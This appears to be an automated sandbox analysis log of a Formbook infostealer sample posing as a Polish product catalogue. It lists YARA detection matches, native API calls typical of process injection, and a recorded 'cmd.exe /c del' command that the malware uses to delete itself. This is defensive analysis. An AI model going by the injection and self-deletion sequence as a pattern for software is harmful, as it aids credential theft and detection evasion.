          Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_00406354
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_00404802
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_00406B2B
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10004E3E
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10003770
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_1000C461
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_1000AC82
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10009574
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_1000B1F4
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10015A1A
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10015A29
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_1000A710
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_1000D3CD
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00401027
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041C94E
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041BA19
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041C3F9
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00408C90
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041BF22
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A820A8
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CB090
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E20A0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A828EC
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71002
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BF900
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009D4120
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A822AE
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EEBB0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7DBD2
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A82B28
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C841F
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7D466
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E2581
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A825DD
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CD5E0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A82D07
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B0D20
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A81D55
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A82EF7
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009D6E30
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A81FF1
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00401027
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00401030
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041C94E
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041BA19
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041C3F9
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00408C90
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00402D90
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041BF22
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00402FB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470D466
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701002
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465841F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_047128EC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046720A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_047120A8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465B090
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04711D55
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04640D20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04664120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464F900
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04712D07
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465D5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_047125DD
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04672581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04666E30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04712EF7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_047122AE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04712B28
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04711FF1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470DBD2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467EBB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0297C94E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_02962FB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_02968C90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_02962D90
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: String function: 0041A4B0 appears 38 times
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: String function: 009BB150 appears 35 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 0464B150 appears 35 times
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_004185D0 NtCreateFile,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00418680 NtReadFile,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00418700 NtClose,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_004187B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_004185CD NtCreateFile,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041867E NtReadFile,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_004186FA NtClose,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_004187AA NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009FB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009FA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009FAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9560 NtWriteFile,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009FA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009FA770 NtOpenThread,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_004185D0 NtCreateFile,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00418680 NtReadFile,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00418700 NtClose,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_004187B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_004185CD NtCreateFile,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041867E NtReadFile,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_004186FA NtClose,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_004187AA NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046895D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046899A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046896E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046896D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0468B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046898F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046898A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0468AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046895F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046899D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0468A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0468A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046897A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0468A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_02978680 NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_029787B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_02978700 NtClose,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_029785D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_029786FA NtClose,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0297867E NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_029787AA NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_029785CD NtCreateFile,
          Source: nowy przyk#U0142adowy katalog.exe, 00000000.00000003.360157911.000000000EB2F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nowy przyk#U0142adowy katalog.exe
          Source: nowy przyk#U0142adowy katalog.exe, 00000001.00000002.426560618.0000000000C3F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nowy przyk#U0142adowy katalog.exe
          Source: nowy przyk#U0142adowy katalog.exe, 00000001.00000002.427125481.0000000002690000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameCMSTP.EXE` vs nowy przyk#U0142adowy katalog.exe
          Source: nowy przyk#U0142adowy katalog.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: nowy przyk#U0142adowy katalog.exeReversingLabs: Detection: 29%
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeFile read: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeJump to behavior
          Source: nowy przyk#U0142adowy katalog.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeProcess created: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
